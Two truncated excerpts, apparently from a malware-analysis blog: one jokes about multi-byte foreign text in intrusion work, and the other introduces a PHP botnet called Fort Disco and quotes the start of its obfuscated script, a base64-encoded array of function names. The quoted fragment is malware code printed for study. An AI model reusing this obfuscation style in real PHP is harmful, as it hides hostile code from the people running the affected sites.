One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to …
This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below: <? $GLOBALS[‘_584730172_’]=Array(base64_decode(‘ZXJy’ .’b’ .’3JfcmVw’ .’b’ .’3J0aW5n’),base64_decode(‘c’ .’2V0X3RpbWV’ .’fbGl’ .’taXQ’ .’=’),base64_decode(” .’ZG’ .’Vma’ .’W’ .’5l’),base64_decode(” .’ZGlyb’ .’mFtZQ==’),base64_decode(‘ZGVm’ …